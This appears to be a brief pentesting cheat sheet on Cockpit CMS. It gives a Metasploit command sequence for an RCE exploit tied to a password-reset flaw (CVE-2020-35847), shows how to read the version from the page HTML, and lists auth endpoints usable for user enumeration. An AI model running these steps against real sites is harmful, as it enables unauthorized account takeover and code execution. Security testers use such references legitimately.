# Cockpit CMS Pentesting

Cockpit CMS is a content management system for publishing contents.

### Enumeration & Remote Code Execution (RCE) & Reverse Shell <a href="#enumeration-remote-code-execution-rce-reverse-shell" id="enumeration-remote-code-execution-rce-reverse-shell"></a>

```
# Reset password  (CVE-2020-35847)
msf> use exploit/multi/cockpit_cms_rce
msf> set USER admin
msf> run
```

### Version Detection <a href="#version-detection" id="version-detection"></a>

Cockpit CMS version is displayed as the value of “data-version” attribute in html tag.

```
<html lang="en" data-base="/" data-route="/" data-version="0.11.1" data-locale="en">
```

### Common Directories <a href="#common-directories" id="common-directories"></a>

```
/auth/check # We can enumerate users using the path
/auth/forgotpassword
/auth/index
/auth/login
/auth/requestreset # We can enumerate users using the path
```